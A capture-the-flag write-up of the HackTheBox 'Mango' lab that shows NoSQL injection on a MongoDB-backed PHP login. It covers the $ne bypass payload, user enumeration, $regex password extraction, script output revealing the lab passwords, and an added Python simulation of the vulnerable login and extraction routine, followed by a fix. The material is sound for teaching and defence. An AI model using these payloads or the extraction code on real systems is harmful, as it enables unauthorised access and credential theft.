NoSQL Injection
The target web application is confirmed to be vulnerable to NoSQL injection in the POST data of the login form at index.php. The injection allowed me to bypass authentication, and it also suggests that the backend database is MongoDB.
Since the page I was redirected to doesn't appear to have much going on, I will attempt to exfiltrate user data using the same NoSQL injection technique.
NoSQL injection is a class of vulnerability in which an attacker is able to inject arbitrary input, including query operators, into NoSQL queries. It is very similar to a traditional SQL injection, except that the target is a NoSQL database. NoSQL is a general term for any database that does not use SQL; a common NoSQL database management system (DBMS) is MongoDB.
While there are plenty of online resources to refer to, the official MongoDB documentation lists the query operators and how they are used.
The comparison operators are $eq, $ne, $gt, $gte, $lt, $lte, $in and $nin; several of them, notably $eq and $ne, can be abused for NoSQL injection because a request field that should hold a string is instead interpreted as an operator object.
The $regex operator can also be used alongside some regular-expression symbols:
^ : the "caret" or "circumflex", which anchors the pattern to the start of a string or line
. : the "wildcard" character or "dot operator", which matches any single character except a newline
* : the "zero or more" quantifier, indicating that the preceding character or group can occur zero or more times
Combining these operators, data exfiltration is achievable: a pattern such as ^t.* is true only for a value that starts with t, so a field can be recovered one character at a time by observing whether the login succeeds.
Users
Using the $eq operator, the existence of the admin user can be confirmed.
The $ne operator was then used with an arbitrary text string, blahblah. There appears to be another user: mango
Passwords
Using the $regex operator alongside the symbols above, I can confirm that the password of the admin user starts with the character t,
followed by the character 9.
The password for the admin user is confirmed to be t9KcS3>!0B#2
The password of the mango user starts with the character h.
The password of the mango user is confirmed to be h3mXK8RhU~f{]f5H
While these two credentials are of no further use for the web application itself, they must be checked for password reuse elsewhere.
Automated
There is a Python script that automates this rigorous process.
The script iterates through all the printable ASCII characters at each position and extends the matched prefix whenever the injected $regex pattern succeeds.
The admin user is found, and it additionally finds the other user, mango
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ python3 nosql-userenum.py -u http://staging-order.mango.htb -m POST -up username -pp password -op login -ep password
No pattern starts with '0'
[...REDACTED...]
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
[...REDACTED...]
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
[...REDACTED...]
No pattern starts with ':'
No pattern starts with ';'
No pattern starts with '<'
No pattern starts with '='
No pattern starts with '>'
No pattern starts with '@'
No pattern starts with '['
No pattern starts with ']'
No pattern starts with '_'
No pattern starts with '`'
No pattern starts with '{'
No pattern starts with '}'
No pattern starts with '~'
No pattern starts with ' '
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
Both passwords are extracted as well.
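As an added example that is not the page's nosql-userenum.py and not the Mango application's own code, the following Python simulates both halves of what this section describes: a login handler that, like a PHP script passing $_POST straight into the query filter, honours $eq, $ne and $regex, and the automated character-by-character extraction with ^prefix.* patterns. The user records, the php_parse_post/probe helper names and the assumption that bracketed field names reach the query as operator objects are mine, not from the write-up; the extraction is generalised to a depth-first walk so that values sharing a prefix are all recovered, and a final ^prefix$ check confirms a complete value.

```python
import re
import string
from urllib.parse import parse_qsl

# Constructed sample collection (the credentials mirror the write-up's).
USERS = [
    {"username": "admin", "password": "t9KcS3>!0B#2"},
    {"username": "mango", "password": "h3mXK8RhU~f{]f5H"},
]


def php_parse_post(body):
    """Mimic PHP's decoding of bracketed field names: 'username[$ne]=x'
    becomes {'username': {'$ne': 'x'}}. Assumption: the target's PHP
    passes this structure into the MongoDB filter untouched."""
    post = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"(\w+)\[([^\]]*)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[key] = value
    return post


def match_field(value, cond):
    """Evaluate one filter condition for the operators used in the write-up.
    A bare string is an equality; a dict is a set of operators that must all hold."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$eq" and value != arg:
            return False
        if op == "$ne" and value == arg:
            return False
        if op == "$regex" and re.search(arg, value) is None:
            return False
        if op not in ("$eq", "$ne", "$regex"):
            raise ValueError("operator not modelled: " + op)
    return True


def vulnerable_login(post):
    """Stand-in for the vulnerable index.php: True when any user document
    satisfies {username: post['username'], password: post['password']}."""
    return any(match_field(u["username"], post["username"])
               and match_field(u["password"], post["password"]) for u in USERS)


# Characters tried at each position; metacharacters are escaped so that
# '.' or '*' in a recovered value match literally rather than as wildcards.
CHARSET = string.ascii_letters + string.digits + string.punctuation


def probe(field, cond):
    """One injected login: `cond` on `field`, $ne '' on the other field so that
    every user is eligible (no username needs to be known in advance)."""
    other = "password" if field == "username" else "username"
    return vulnerable_login({field: cond, other: {"$ne": ""}})


def user_exists(user):
    """The $eq check from the Users section."""
    return probe("username", {"$eq": user})


def extract_all(field, charset=CHARSET):
    """Recover every distinct value of `field` one character at a time with
    ^prefix<char>.* patterns. Depth-first, so values that share a prefix are
    all found; '^prefix$' confirms a complete value rather than a prefix."""
    found = []

    def walk(prefix):
        if prefix and probe(field, {"$regex": "^" + re.escape(prefix) + "$"}):
            found.append(prefix)
        for ch in charset:
            if probe(field, {"$regex": "^" + re.escape(prefix + ch) + ".*"}):
                walk(prefix + ch)

    walk("")
    return found


if __name__ == "__main__":
    # Authentication bypass with the $ne payload from the Users section.
    print("bypass:", vulnerable_login(
        php_parse_post("username[$ne]=blahblah&password[$ne]=blahblah")))
    print("users:", extract_all("username"))
    print("passwords:", extract_all("password"))
```

The fix on the application side is the inverse of php_parse_post: cast each credential to a string (or reject any non-scalar value) before it is placed in the filter, so that an operator object can never reach the query.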